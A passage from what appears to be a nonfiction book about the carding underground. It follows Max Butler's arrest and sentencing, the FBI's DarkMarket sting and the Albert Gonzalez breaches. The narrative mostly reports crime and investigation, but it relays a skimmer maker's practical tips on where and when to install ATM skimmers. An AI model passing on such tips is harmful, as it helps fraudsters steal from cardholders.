Charity glanced skeptically at the Ford. +American-made cars were just one of the many things that +alarmed Max these days. +Weeks had passed since Chris’s arrest, and reading the +press coverage from Orange County, Max couldn’t get over +how much evidence the police had found in Aragon’s +home. Using Chris’s payout sheets as a road map, the +cops had rounded up his entire cashing crew; even Marcus, +Chris’s pot grower and errand boy, was busted with a +hydroponic dope farm growing in his Archstone apartment. +After two weeks of hunting, the police converged on Chris’s +credit card factory at Federico Vigo’s office in the Valley, +arrested Vigo, and seized the counterfeiting gear. Chris +was being held on a million dollars’ bail. +The entire operation had been dismantled piece by +piece. They were calling it perhaps the largest identity-theft +ring in Orange County’s history. +“Shit, I wonder what kind of records he kept on all that,” +Max later wrote The3C0rrupted0ne. “I mean, if he was +sloppy enough to have equipment at his house.” +Max had already ditched his prepaid cell phone and +instituted a “security ban” on his former partner’s Carders +Market account. They were routine precautions—he was +largely unconcerned about the bust at first; it was, after all, +just a state case. Chris had been caught red-handed at the +W, too, and that time he walked away with probation. +But as the weeks passed with Chris still in jail, Max +started to worry. He was noticing strange cars parked on + +his street—an animal control van aroused his suspicion so +much he got out a flashlight to peer in the windows. Then a +San Francisco FBI agent called him out of the blue to +inquire about Max’s long-dead arachNIDS database. Max +decided to invest in a rope ladder; he kept it by the back +window of the apartment he shared with Charity, in case he +had to get out fast. +He’d pause every now and then to reflect on his freedom +—here he was, enjoying life, hacking, while at that very +moment Chris was in a jail cell in Orange County. +Max picked a random San Francisco criminal defense +attorney from the yellow pages, walked into his office, and +handed over a pile of cash; he wanted the lawyer to travel +to Southern California to check on Chris and see if there +was anything he could do. The attorney said he’d look into +it, but Max never heard back from him. +It was then that Max finally learned about Giannone’s bust +from a news article about Brett Johnson’s life as an +informant. Max had lost track of Giannone, and for all his +hacking, Max had never thought to run the names of his +associates through the public federal court website. The +news that Giannone had lost a criminal trial worried him. +“Of all the rat snitch piece of shit motherfuckers out there, +Giannone is the closest to being able to finger me for the +feds,” he confided in a post to the private administrators’ +forum on Carders Market. “The little dipshit might actually +be able to get the feds close to me.” +Max uprooted from Fox Plaza, hiding his equipment at +home until he was set up with a new sanctuary. On June 7, +he picked up the keys at the Oakwood Geary, another +corporate apartment building carved out of gleaming +marble in the Tenderloin. He was “Daniel Chance” now, just +another displaced software drone relocating to the Bay +Area. The real Chance was fifty years old and bearded, +while Max was clean shaven with long hair—but the fake +driver’s license and genuine money order were enough to +get him in. + +get him in. +The next evening, Max checked out a red Mustang from +his neighborhood Zipcar and packed it with his computer +gear. For all his paranoia, he didn’t notice the Secret +Service agents tailing him on the drive to the Oakwood and +watching from the street as he moved into his new safe +house. +A month later, Max jolted awake, shot upright in bed, and +blinked into the darkness of the flat. It was just Charity; she +had crawled into bed next to him, trying in vain not to wake +him. He was growing jumpier every day. +“Sweetie, you can’t keep doing this,” Charity murmured. +“You may not realize it, but I realize it. I can see it. You’re +getting too sucked into it mentally. You’re losing focus of +who you are and what you’re doing.” +“You’re right,” he said. “I’m done.” +A lot of time had passed since his last prison term, he +thought. Maybe he could find honest work again. NightFox +had already offered him a legitimate job in Canada, but +he’d turned it down. He couldn’t bring himself to leave +Charity. He’d been contemplating marriage, playing with +the idea of luring her to Las Vegas on a vacation and +popping the question there. She was fiercely independent, +but she couldn’t argue that he hadn’t given her space. +It was time, he decided, for Max Vision, white hat, to +return. It would be official. He visited the San Francisco +courthouse and filled out the necessary paperwork. On +August 14, a judge approved his legal name change from +Max Butler to Max Ray Vision. +He already had an idea for a new website that could +catapult him back into the white-hat scene: a system for +disclosing and managing zero-day vulnerabilities. He could +seed it with the security holes he was privy to in the +underground, bringing the exploits into the white-hat world +like a defector crossing Checkpoint Charlie with a suitcase +full of state secrets. + +But after all his work making Carders Market the top +crime forum in the English-speaking world, he couldn’t +bring himself to just abandon it. +Max returned to his safe house. It was August, and the +heat was back—the temperature topped 90 degrees +outside, and higher in his studio. His CPU was threatening +to burn itself alive. He turned on his fans, sat at his +keyboard, and began the work of phasing out his Digits +and Aphex identities. +He logged on to Carders Market and, as Digits, posted a +note that he was shunting his dumps vending to +Unauthorized, one of his admins. Then, as Aphex, he +announced that he was retiring from carding and was +selling Carders Market. He let the announcement sit for a +few minutes and then took down the site. When he brought +it back up, Achilous, one of his administrators in Canada, +was in charge. Max created a new, generic handle for +himself, “Admin,” to help Carders Market’s new kingpin +during the transition. +He was still working on his exit strategy when an instant +message popped up on his screen. It was from Silo, the +Canadian carder who was always trying, and failing, to +hack him. Max had tracked him down and identified him as +Lloyd Liske in British Columbia. He suspected Liske was +an informant. +The note was odd, a long sentence about newbies +making dumb mistakes. But Silo had hidden a second +message within it by strategically capitalizing nine of the +letters. +They spelled out “MAX VISION.” +A guess, Max thought. Silo couldn’t possibly know +anything. +It was just a guess. +• • • +The day after Max announced his retirement, Secret + +Service agent Melissa McKenzie and a federal prosecutor +from Pittsburgh flew to California to tie up some loose +ends. +The investigation was nearly complete. The Secret +Service had gotten ahold of Digits’s e-mail from a contact +at the Vancouver Police Department—Silo’s handler. Max +had been using a Canadian-based webmail provider called +Hushmail that provides high-security encryption, using a +Java applet that decrypts a customer’s messages right on +his own PC instead of the company’s server. In theory, the +arrangement ensures that even Hushmail can’t get at a +customer’s secret key or incoming e-mail messages. The +company openly marketed the service as a way to +circumvent FBI surveillance. +But, like e-gold, Hushmail was another formerly crime- +friendly service now being mined by law enforcement. U.S. +and Canadian agencies had been winning special orders +from the Supreme Court of British Columbia that forced +Hushmail officials to sabotage their own system and +compromise specific surveillance targets’ decryption keys. +Now the feds had Max’s e-mail. +At the same time, the agency had located Tea living in +Berkeley serving a probation sentence—it turned out she’d +been caught using Aragon-produced gift cards at the +Emeryville Apple Store months earlier. It was supposed to +be a training run for one of Chris’s new recruits, but Tea +had never cashed before, and when she impulsively added +a PowerBook to her iPod purchase, she was arrested +along with the trainee. Eager to avoid more trouble, she’d +told the Secret Service everything she knew. +Meanwhile, the Secret Service had begun sporadic +physical surveillance of Max. From Werner Janer’s proffers, +Mularski had learned that Max had a girlfriend named +Charity Majors. Public records provided her address, and a +subpoena of her bank records showed she had a joint +account with Max. The Secret Service staked out the house +and eventually trailed Max to the Oakwood Geary. + +Electronic surveillance confirmed that Max was operating +from the Oakwood. The FBI had won a secret court order +letting them electronically monitor the IP addresses +connecting to Carders Market’s false front at a U.S. hosting +company—the modern equivalent of taking down the +license plates outside a mob hangout. Several traced back +to broadband subscribers living within a block of the +corporate apartment complex and running Wi-Fi. +Two weeks earlier, a female Secret Service agent +disguised as a maid had ridden up the elevator with Max +and watched him unlock apartment 409. The apartment +number was the last piece of data they’d needed. +There was just one more stop before they’d move in: the +Orange County Central Men’s Jail, a grim lockup in the flat, +sun-baked center of Santa Ana, California. McKenzie and +federal prosecutor Luke Dembosky were shown to an +interview room to meet Chris Aragon. +Chris was the last holdout in the Orange County crew. +Clara and six members of his crew were headed to plea +deals that would ultimately net them from six months to +seven years in prison. Clara would get two years and eight +months. Chris’s mother was looking after the two boys. +Once the introductions were made, McKenzie and +Dembosky got down to business. They couldn’t do anything +about Chris’s state case, but if he cooperated, he’d have a +nice letter in his file from the U.S. government attesting that +he’d helped in a major federal prosecution. That could sway +the judge at sentencing time. It was all they could do. +McKenzie produced a photo lineup and asked Chris if +anyone looked familiar. +Chris’s situation was grim. With his bank robberies and +drug-smuggling convictions, he was eligible for California’s +tough three-strikes law. That meant a mandatory twenty- +five-to-life. +Chris picked out Max’s mugshot from the photos. And +then he told the feds the story of Max Vision’s drift to the + +dark side. +• • • +On Wednesday, September 5, 2007, Max dropped Charity +at the post office on an errand and directed his cab driver +downtown to the CompUSA store on Market Street. He +picked up a new fan for his CPU, walked to his apartment, +stripped down, and crashed out on his bed amid a tangle of +unfolded laundry. He settled into a deep slumber. +Max had stopped hacking, but he was still disentwining +himself from his double life—after five years, he had a lot of +relationships and ventures that he couldn’t just sever +overnight. +He slept right through the knock at his door at about two +p.m. Then the door flew open, and a half-dozen agents +rushed into the room, guns drawn, shouting orders. Max +bolted upright and screamed. +“Put your hands where I can see them!” an agent yelled. +“Lay down!” The agent was positioned between Max and +his computers. Max had often thought that, in a raid, he +might be able to pull the plug on his server, making his +already formidable cyberdefenses completely bulletproof. +Now that it was really happening, he realized that diving for +his machines wasn’t an option, unless he wanted to be +shot. +Max recovered his composure. Unplugged or not, his +machines were locked down, and his encryption was rock +solid. He managed to relax a little as the agents let him get +dressed, then walked him down the hall in handcuffs. +On the way, they passed a three-man team who’d been +waiting for the Secret Service to secure the safe house. +They weren’t feds; they were from Carnegie Mellon +University’s Computer Emergency Response Team, and +they were there to bust Max’s crypto. +It was the first time CERT had been invited to a raid—but +the circumstances were special. Chris Aragon had + +employed the same DriveCrypt whole-disk-encryption +software that Max used, and neither the Secret Service nor +CERT had been able to recover anything from the drive. +Full-disk encryption keeps the entire hard drive encrypted +at all times: all the files, the file names, the operating +system, the software, the directory structure—any clue to +what the user has been doing. Without the decryption key, +the disk might as well have been a Frisbee. +The key to cracking a full-disk encryption program is to +get at it while it’s still running on the computer. At that point, +the disk is still fully encrypted, but the decryption key is +stored in RAM, to allow the software to decrypt and encrypt +the data from the hard drive on the fly. +The knock on Max’s door had been intended to draw +Max away from his machines; if he’d shut them down +before the Secret Service got the cuffs on, there wouldn’t +have been much CERT could do—the contents of the RAM +would have evaporated. But Max had been caught napping, +and his servers were still running. +CERT had spent the last two weeks gaming out different +scenarios for what they might encounter in Max’s safe +house. Now the team leader looked over the setup: Max’s +server was wired to half a dozen hard drives. Two had lost +power when an agent tripped over an electrical cable +snaking across the floor, but the server itself was still +running, and that was what mattered. +While Secret Service flashbulbs bounced off the walls of +Max’s cluttered apartment, the forensics experts moved to +the machines and began their work, using memory- +acquisition software they’d brought with them to suck down +the live data from the RAM onto an external storage device. +Down the hall, Max cooled his heels in the feds’ +apartment. +Two agents watched over him. Max would be questioned +later—for now, the agents were just babysitting, chatting +with one another. The Secret Service agent was from the +local San Francisco field office; he asked his FBI + +local San Francisco field office; he asked his FBI +counterpart where he worked. +“I’m from Pittsburgh,” Keith Mularski answered. +Max’s head snapped to look at Master Splyntr. There +was no doubt who had won the carder war. +The Secret Service agents exulted over the bust. “I’ve +been dreaming about you,” agent Melissa McKenzie said +as she drove Max to the field office. On seeing his raised +eyebrow, she added, “I mean about Iceman. Not you +personally.” +Two of the local agents were dispatched to Charity’s +house. They told her what happened and took her +downtown to say good-bye to Max. +“I’m sorry,” he told her when she walked in. “You were +right.” +Max talked to the agents at the field office for a while, +trying to feel them out for what they knew and gauge how +much trouble he was in. Some of them seemed surprised +at his politeness—his sheer likability. Max wasn’t what they +expected from the cold, calculating kingpin they’d been +tracking for a year. +On the drive to jail, McKenzie finally voiced her +puzzlement. You seem like a nice guy, she said, and that’s +going to help you. “But I have this one question for you.… +“Why do you hate us?” +Max was speechless. He never hated the Secret +Service, or the FBI, or even the informants on Carders +Market. Iceman did. But Iceman was never real; he was a +guise, a personality Max slipped on like a suit when he was +in cyberspace. +Max Vision never hated anyone in his life. +The Hungry Programmers were the first to hear the news +that Max had been arrested again. Tim Spencer offered to +sign for Max’s bail bond. For collateral, he had twenty acres +of land in Idaho that he’d bought as his dream retirement +property. When Tim heard the details of the charges + +against his old friend, he hesitated. What if he didn’t really +know Max at all? +The moment of doubt passed, and he signed the form. +Max’s mother offered to post the equity in her house as well +to secure her son’s release. Ultimately, though, it didn’t +matter. When Max came up for arraignment in San Jose, a +federal magistrate ordered the hacker held without bail +pending his transport to Pittsburgh. +The government announced Iceman’s arrest on +September 11, 2007. The news hit Carders Market, +sparking a flurry of activity. Achilous immediately deleted +the entire database of posts and private messages, not +knowing the feds already had it. “I think the SQL database +almost had a heart attack when I did it, but it’s done now. I +think this is what Aphex would have wanted,” he wrote. +“This forum is open for posting, so people can chat and +figure out where to go from here. Just be very careful, +specifically about following links. Try to keep the conspiracy +theories to a minimum everyone, please. +“Good luck, be safe.” +Silo jumped in under an alias to wrongly label his former +rival a snitch, based on news reports that misunderstood +Max’s work for the FBI during his white-hat days. “It’s sad to +see a brilliant guy go,” he wrote. “He brought a lot to this +board and the scene as a vendor and an administrator. A +lot of guys made a lot of money from him.” +But “once a rat always a rat,” he wrote, with no trace of +irony. “This whole board is spawned out of the fact that +years ago the FBI and Aphex had a disagreement on +whom he was snitching out.… Bottom line, he is the biggest +hypocrite to ever grace the scene.” +Back at his desk in Pittsburgh, Mularski put on Master +Splyntr’s black hat to join the postgame analysis. The FBI +agent knew full well that Iceman hadn’t been an informant, +but his alter ego would be expected to seize on the news +that Max had once worked with the feds. “Oh just where do I +even begin?” He gloated on DarkMarket, enjoying the + +even begin?” He gloated on DarkMarket, enjoying the +moment. “Let’s see … let’s see … How about with this +headline from SFGate.com? And I quote, ‘Ex-FBI snitch in +S.F. indicted in hacking of financial institutions.’ +“Did anyone else notice anything about that headline? +Ahh yeah, FBI Snitch. This is turning out to be just like +Gollumfun and El. No wonder why Iceman always had a +hard-on for them, because he was just like them and was +competing for his handlers’ praises.” +When Max arrived in Pittsburgh, his new public defender +tried again to get him released on bail, but the judge +refused after prosecutors speculated that Max was sitting +on vast stores of hidden cash and could easily use his +contacts to disappear with a new name. To prove that he’d +tried to evade the feds, they played their trump card: private +messages written by Max himself describing his use of +false IDs while traveling and his “evasive move” to his final +safe house. Max had sent the messages to a Pittsburgh +Secret Service informant who’d been an admin on Carders +Market for a full year. +Max wasn’t at all surprised to see that it was +Th3C0rrupted0ne. + +34 + +DarkMarket +he man is sitting rigid on a polished wooden chair and +staring balefully into the camera. Paint peels from a +cracked plaster wall behind him. He’s been stripped down +to his underwear, and he’s holding a handwritten sign over +his exposed paunch. I AM KIER, it reads, in large block +letters. MY REAL NAME IS MERT ORTAC.… I AM RAT. I AM PIG. I AM +FUCKED BY CHA0. +The appearance of the photo on DarkMarket in May +2008 sent Mularski hurrying back into the NCFTA +communications room. Headquarters would want to know +that one of Master Splyntr’s admins had just kidnapped and +tortured an informant. +Cha0 was an engineer in Istanbul who sold high-quality +ATM skimmers and PIN pads to fraudsters around the +world. Covertly affixed to a cash machine, the skimmer +would record the magstripe data on every debit or credit +card fed into the ATM, while the PIN-pad overlay stored the +user’s secret code. +Cha0 cut a jaunty presence in the underground. His +Flash-animated banner ad on DarkMarket was a classic, +opening with a cartoon man wading through a house full of +cash. “Is that you?” the text asks. “Yes. If you bought a +skimmer and PIN pad from Cha0.” A similarly styled video +tutorial for new customers was narrated by a smiling +caricature of Cha0 himself. “Hi, my name is Cha0. I’m a +developer of skimming devices. I work for you twenty-four +hours a day and make the best devices for skimming. You’ll +be able to make money in this business with me and my +group. We make these devices for newbies—it’s that easy + +to use!” The animated Cha0 goes on to offer practical +advice: Don’t install your skimmer in the morning, because +passersby are more vigilant at that time. Don’t choose a +location where 250 people or more pass a day. Avoid +cities with a population less than 15,000—residents know +too well what the ATM is supposed to look like and might +notice Cha0’s product. +Notwithstanding his whimsical marketing, Cha0 had +always made it clear to his friend Master Splyntr that he +was a serious criminal, not afraid to get physical to protect +his multimillion-dollar business. Now he’d proven it. Mert +“Kier” Ortac had been part of Cha0’s organization, the +Crime Enforcers, until he went running to a Turkish TV +station to blab about Cha0’s activities. After a couple of +interviews, he vanished. When he resurfaced a short time +later, he told a harrowing story about being abducted and +beaten by Cha0 and his henchmen. +Now Cha0 had confirmed the tale by posting the kidnap +photo to DarkMarket as a warning to others. +The image put proof to the FBI’s long-held suspicions +that the computer underground was getting violent. With +hundreds of millions of dollars pouring into the scene every +year, it had seemed inevitable that the carders would take +on the brutal methods of traditional organized crime to +enlarge or protect their illegal income. +With Max safely locked up in an Ohio detention center, +DarkMarket had been free to grow, and Mularski was +closing in on its heaviest hitters—Cha0 among them. A +Turkish cybercrime detective had spent three months at the +NCFTA on a fellowship and was working with Mularski to +run down the skimmer maker. +Mularski had sent Cha0 two lightweight PCs as a gift the +previous year, opening the first door in the investigation. +Cha0 had directed the shipment to flunkies in his +organization, who were promptly put under surveillance by +the Turkish National Police. That led to Cagatay Evyapan, +an electrical engineer with a prior criminal record—details + +an electrical engineer with a prior criminal record—details +that jibed with the biography Cha0 had shared privately with +Mularski. +The police approached several international shipping +companies and briefed them about Cha0’s operations. +One of them identified some of the skimmer shipments +from Istanbul to Europe, fingering a known member of +Cha0’s organization as the shipper. +That gave the police the evidence they needed. On +September 5, five police in bulletproof vests raided Cha0’s +apartment on the outskirts of Istanbul. They rushed into his +house and pushed Cha0 and an associate to the ground at +gunpoint. +Inside his apartment was a complete electrical lab and +assembly line, with components neatly organized in trays +and bins. Nearly a dozen computers were running on the +desks. Cha0 had all the same card-counterfeiting +equipment that had graced Chris Aragon’s factory, as well +as giant cardboard boxes holding some one thousand +skimmers and two thousand PIN pads, all awaiting +international shipment. Cha0’s records showed that four of +them had already gotten into the United States. +The cops brought Evyapan out in handcuffs, a tall, beefy +man with close-cropped hair and a black T-shirt +emblazoned with the Grim Reaper. The face of organized +crime in the Internet age. +Cha0 was the last listed target in Mularski’s undercover +authorization; the other key DarkMarket players had +already been taken down. Markus Kellerer, Matrix001, was +arrested in Germany in May 2007 and spent four months in +a high-security prison. Renukanth “JiLsi” Subramaniam, a +Sri Lankan–born British citizen, was raided in London in +June 2007 after detectives with the Serious Organised +Crime Agency in Britain staked out the Internet café he +used as an office, matching his appearances at the Java +Bean with JiLsi’s posts on DarkMarket and his chats with + +Master Splyntr. JiLsi’s associate, sixty-seven-year-old John +“Devilman” McHugh, was picked up at the same time; +police found a credit card counterfeiting factory in the +senior citizen’s home. +In Turkey, six members of Cha0’s organization were +charged along with Cha0. With Mularski’s help, the police +also swooped in on Erkan “Seagate” Findikoglu, a +DarkMarket member who ran a massive King Arthur–style +cash-out operation responsible for at least two million +dollars in thefts from U.S. banks and credit unions—they +recovered one million of it in cash at his arrest. Twenty- +seven members of Seagate’s organization were charged in +Turkey, and the FBI rounded up six of his cashers in the +United States. +With Cha0 and Seagate in jail, Mularski’s work was done +—his two years running DarkMarket had now resulted in +fifty-six arrests in four countries. On Tuesday, September +16, 2008, he drafted a post formally announcing the closure +of the site. As an homage to the carding world’s history and +culture, the FBI agent borrowed from King Arthur’s +legendary message closing Carder Planet years before. +“Good day, respected and dear forum members,” he +began. +It is time to tell you the bad news—the forum should +be closed. Yes, I really mean closed. +Over the last year we have lost a lot of the admins of +the forums: Iceman on Carders Market; JiLsi and +Matrix001 disappeared, and now, Cha0 on DM. It is +apparent that this forum, which has been around +almost three years, is attracting too much attention +from a lot of the world services.… +I myself would rather go out like King Arthur than +Iceman. Whereas Iceman decided that all he would do +was change his nick to Aphex, and continue to run CM, +King Arthur closed CarderPlanet and faded into the +night. History has shown that Iceman made a fatal + +mistake. I will not make the same. +Mularski planned to keep his Master Splyntr identity +dormant but alive: He’d have a well-established +underground legend that he could pull from his pocket +whenever he needed it in future investigations. But it was +not to be. About a week after DarkMarket went dark, a +reporter for Südwestrundfunk, Southwest Germany public +radio, got his hands on court documents filed in Matrix’s +case that laid bare Mularski’s double life. The U.S. press +picked up the story. Now 2,500 members of DarkMarket +knew they’d been doing business on a sting site and that +Iceman had been right all along. +Three days after the story broke in the United States, +Mularski found an ICQ message to Master Splyntr waiting +on his computer. It was from TheUnknown, a UK target +who’d gone on the run after he was raided by the British +police. “U fucking piece of shit. Motherfucker. Thought you +can catch me. Hahaha. Fucking newb. U are nowhere near +me.” +“If you want to make arrangements to turn yourself in, let +me know,” Mularski wrote back. “It will be easier than +looking over your shoulder the rest of your life.” +TheUnknown turned himself in a week later. +Mularski was almost relieved to have his secret identity +revealed; for two years, his laptop had been his constant +companion—even on vacation, he’d been online talking to +carders. He’d enjoyed some of it—building online +friendships with some of his targets, teasing and taunting +others. Master Splyntr could say things to criminals that a +respectable FBI agent never could. +Eager as Mularski was to have his life back, it would take +time. Nearly a month after DarkMarket’s closing, he was +still fighting a vague restlessness. Mularski had one more +challenge to master. He’d have to learn how to not be +Master Splyntr. + +35 + +Sentencing +ax towered over the marshals as they brought him +into the Pittsburgh courtroom to face sentencing. He wore +an ill-fitting orange jail uniform, his hair trimmed short and +neat. +His escorts uncuffed his hands, and he took a seat next +to his public defender at the defense table. A half-dozen +reporters talked among themselves on one side of the +gallery, an equal number of feds on the other. Behind them, +the long wooden pews were mostly empty: no friends, no +family, no Charity; she’d already told Max she wasn’t going +to wait for him. +It was February 12, 2010, two and a half years after his +arrest at the safe house. Max had spent the first month +locked up at the Santa Clara county jail, speaking daily with +Charity in long phone calls more intimate than any +conversations they’d had while he was immersed in his +crimes. The marshals finally put him on a plane and +checked him into a detention facility in Ohio, where Max +made peace with his confinement, largely drained now of +the self-righteous anger that carried him through his +previous imprisonments. He made new friends in the joint: +geeks like him. They started a Dungeons and Dragons +campaign. +By year’s end, Max had no more secrets. It had taken the +CERT investigators only two weeks to find the encryption +key in the image of his computer’s RAM. At one of his court +appearances, prosecutor Luke Dembosky handed Max’s +lawyer a slip of paper with his passphrase written on it: +“!!One man can make a difference!” + +For years, Max had used his encrypted hard drive as an +extension of his brain, storing everything he found and +everything he did. That the feds had it was disastrous for +his legal future, but more than that, it felt like an intimate +violation. The government was in his head, reading his +mind and memories. When he returned to his cell after the +hearing, he wept into his pillow. +They had everything: five terabytes of hacking tools, +phishing e-mails, dossiers he’d compiled on his online +friends and enemies, notes on his interests and activities, +and l.8 million credit cards accounts from over a thousand +banks. The government broke it down: Max had stolen 1.1 +million of the cards from point-of-sale systems. The +remainder mostly came from the carders Max had hacked. +It was eight miles of magstripe data, and the feds were +prepared to charge him for every inch. The government had +secretly flown Chris to Pittsburgh for weeks of debriefing +while the credit card companies tallied the fraudulent +charges on Max’s cards, arriving at a staggering $86.4 +million in losses. +Max’s profits were far less: Max told the government he +earned under $l million from his capers and had pissed +most of it away on rent, meals, cab fare, and gadgets. The +government found about $80,000 in Max’s WebMoney +account. But federal sentencing guidelines in theft cases +are based on victim harm, not the offender’s profits, so Max +could be held responsible for the charges rung up by Chris, +the carders who bought dumps from Digits and Generous, +and potentially the fraud performed by the carders Max +hacked. Rolled up with Max’s rap sheet, the $86 million +translated to a sentence of thirty years to life, with no +parole. +Faced with decades in prison, Max began cooperating +with the investigation. Mularski took him out for long +debriefing sessions about the hacker’s crimes. At one of +them, after the DarkMarket sting broke in the press, Max +apologized to Mularski for his attempts to expose Master + +apologized to Mularski for his attempts to expose Master +Splyntr. Mularski heard sincerity in his old foe’s voice and +accepted his apology. +After a year of negotiation, Max’s lawyer and the +government settled on their number—a joint +recommendation to the judge of thirteen years. In July 2009, +Max had pleaded guilty. +The deal wasn’t binding on the court; in theory, Max could +be released on the spot, sentenced to life, or anything in +between. The day before the sentencing, Max typed out a +four-page letter to his judge, Maurice Cohill Jr., a seventy- +year-old Ford appointee who’d been a jurist since before +Max was born. +“I don’t believe further prison time in my case will help +anyone,” Max wrote. “I don’t think it is necessary because +all I want to do is help. I disagree with the blanket +assessment of the sentencing guidelines. Unfortunately, I +am facing such a horrible sentence that even 13 years +seems ‘good’ in comparison. But I assure you it is overkill +as I am the proverbial dead horse. That said, I plan to make +the most of the time I have left on this earth be it in prison or +otherwise.” +He continued. “I have a lot of regrets, but I think my +essential failing was that I lost touch with the accountability +and responsibility that comes with being a member of +society. A friend of mine once told me to behave as though +everyone could see what I was doing all the time. A sure +way to avoid engaging in illegal conduct, but I guess I +wasn’t a believer because when I was invisible, I forgot all +about this advice. I know now that we can’t be invisible, and +that it’s dangerous thinking.” +Max watched with studied calmness as his lawyer stood +to confer with the prosecution over last-minute details and +the courthouse staff went through their prehearing checklist, +testing the microphones and shuffling papers. At ten thirty +a.m. the door to chambers opened. “All rise!” +Judge Cohill took the bench. A wizened man with a + +close-cropped snow-white beard, he peered at the +courtroom through round glasses and announced the +sentencing of Max Butler, the name under which Max had +been charged. He read Max’s sentencing guidelines for the +record, thirty years to life, then listened as prosecutor +Dembosky laid out his case for leniency. Max had provided +significant help to the government, he said, and was +deserving of a sentence below the guidelines. +What followed could have been an awards presentation +instead of a sentencing hearing, with Max’s lawyer, +prosecutor, and judge taking turns praising Max’s computer +skills and apparent remorse. “He’s an extremely bright, self- +taught computer expert,” said federal public defender +Michael Novara, albeit one who orchestrated “computer +security breaches on a grand scale.” +Dembosky, a computer-crime specialist and seven-year +veteran of the U.S. Attorney’s Office, called Max “extremely +bright and articulate and talented.” He’d been at some of +Max’s debriefings, and like virtually everyone who knew +Max in real life, he’d grown to like the hacker. “He’s almost +wide-eyed and optimistic in his view of the world,” he said. +Max’s cooperation, he added, was why they were asking +for only thirteen years instead of an “astronomical” +sentence. “I believe that he is very sorry.” +Max had little to add. “I’ve changed,” he said. Hacking no +longer held any appeal for him. He invited Judge Cohill to +ask him any questions. Cohill didn’t need to. The judge said +he was impressed by Max’s letter and by letters written by +Charity, Tim Spencer, and Max’s mother, father, and sister. +He was satisfied that Max was remorseful. “I don’t think I +have to give you a lecture on the problems you’ve caused +for your victims.” +Cohill had already written the sentencing order. He read +from it aloud. Thirteen years in prison. Max would also be +responsible for $27.5 million in restitution, based on the +cost to the banks of reissuing the 1.1 million cards Max +stole from point-of-sale systems. Upon his release, he’d + +stole from point-of-sale systems. Upon his release, he’d +serve five years of court supervision, during which he’d be +allowed to use the Internet only for employment or +education. +“Good luck,” he said to Max. +Max stood up—his face neutral—and let a marshal +handcuff him behind his back, then lead him through the +door in the back of the courtroom connecting to the holding +cells. With credit for time served and good behavior, he’d +be out just before Christmas 2018. +Almost nine years in prison were still ahead of him. At the +time it was the longest U.S. sentence ever handed out to a +hacker. + +36 + +Aftermath +y the time Max was sentenced, the Secret Service had +identified the mystery American hacker who’d made +Maksik into the world’s top carder, and he was poised to +get a sentence that would make Max’s look like a traffic +fine. +The big break in the case came from Turkey. In July +2007, the Turkish National Police learned from the Secret +Service that Maksik, twenty-five-year-old Maksym +Yastremski, was vacationing in their country. An undercover +Secret Service operative lured him to a nightclub in Kemer, +where police arrested Yastremski and seized his laptop. +The police found the laptop hard drive impenetrably +encrypted, just as when the Secret Service performed its +sneak-and-peek in Dubai a year earlier. But after a few +days in a Turkish jail, Maksik coughed up the seventeen- +character passphrase. The police gave the passphrase +and a copy of the disk to the Secret Service, which began +poring over its contents, taking particular interest in the logs +Maksik kept of his ICQ chats. +One chat partner stood out: ICQ user 201679996 could +be seen helping the Ukrainian with a hack attack against +the restaurant chain Dave & Buster’s and discussing some +of the earlier high-profile intrusions that had put Maksik on +the map. The agents checked out the ICQ number and +obtained the e-mail address used to first register the +account: soupnazi@efnet.ru. +SoupNazi was a name the agency had heard before—in +2003, when they arrested Albert Gonzalez. +Gonzalez was the informant who’d lured Shadowcrew + +carders into a wiretapped VPN, leading to the twenty-one +arrests in Operation Firewall—the Secret Service’s +legendary crackdown on the carding scene. But years +before he was known as Cumbajohnny on Shadowcrew, +Gonzalez had used the Seinfeld-inspired handle SoupNazi +in IRC. +The carder turncoat who’d made Operation Firewall +possible had gone on to stage the largest identity thefts in +U.S. history. +One month after Firewall, Gonzalez had gotten +permission to move from New Jersey back to his home, +Miami, where he’d launched the second act of his hacking +career. He took on the name Segvec and passed himself +off as a Ukrainian, hanging his hat on the Eastern +European forum Mazafaka. Under the rubric Operation Get +Rich or Die Tryin’—the title of a 50 Cent album and +Maksik’s Shadowcrew motto—he went on to create a +multimillion-dollar cybertheft ring that touched tens of +millions of Americans. +On May 8, 2008, the feds swooped in on Gonzalez and +his U.S. associates. Hoping for leniency at sentencing, +Gonzalez cooperated again, providing agents with the +encryption key for his hard drive and giving them +information on his entire gang. He admitted to the breaches +at TJX, OfficeMax, DSW, Forever 21, and Dave & Buster’s, +and to helping Eastern European hackers penetrate the +grocery chain Hannaford Bros., 7-Eleven’s ATM network, +Boston Market, and the credit card processing company +Heartland Payment Systems, which alone leaked nearly +130 million cards. It was a lucrative business for the hacker. +Gonzalez drew the Secret Service a map to over $1 million +in cash he’d buried in his parents’ backyard; the +government sought forfeiture of the money, his 2006 BMW, +and a Glock 27 firearm with ammunition. +Gonzalez had built his crew from an untapped reservoir +of hacker talent—onetime bedroom hackers who had + +trouble finding a place in the white-hat world. Among them +was Jonathan “C0mrade” James, who’d hacked NASA as +a teenager and received a landmark six-month juvenile +sentence the same week Max Vision pleaded guilty to his +Pentagon hacks in 2000. After a brief flurry of fame— +including an interview on PBS’s Frontline—James slipped +into obscurity, living quietly in a house he inherited from his +mother in Miami. +Then in 2004 he allegedly began working with Gonzalez +and an associate named Christopher Scott. The +government believes James and Scott were responsible +for one of the earliest magstripe hauls to make their way +into Maksik’s vaults, cracking OfficeMax’s Wi-Fi from a +store parking lot in Miami and stealing thousands of swipes +and encrypted PINs. The two allegedly provided the data to +Gonzalez, who arranged with another hacker to decrypt the +PIN codes. Credit card companies later reissued some two +hundred thousand cards in response to the attack. +Of all the hackers, it was Jonathan James who would pay +the highest price in the post-Shadowcrew carder +crackdown. In the days after his May 2008 raid, James +became convinced the Secret Service would try to pin all of +Gonzalez’s breaches on him to wring public relations juice +out of his notorious past and protect their informant, +Gonzalez. On May 18, the twenty-four-year-old stepped into +the shower with a handgun and shot himself dead. +“I have no faith in the ‘justice’ system,” read his five-page +suicide note. “Perhaps my actions today, and this letter, will +send a stronger message to the public. Either way, I have +lost control over this situation, and this is my only way to +regain control.” +In March 2010, Gonzalez was sentenced to twenty years +in prison. His U.S. coconspirators drew sentences ranging +from two to seven years. In Turkey, Maksik was convicted +of hacking Turkish banks and sentenced to thirty years. + +Since Max’s arrest, new scams have emerged in the +underground, the worst of them involving specialized Trojan +horse software designed to steal a target’s online banking +passwords and initiate money transfers from the victim’s +account right through his own computer. The thieves have +devised an ingenious solution to the problem that had +bedeviled Chris Aragon: how to get at the money. They +recruit ordinary consumers as unwitting money launderers, +dangling bogus work-at-home opportunities, in which the +“work” consists of accepting money transfers and 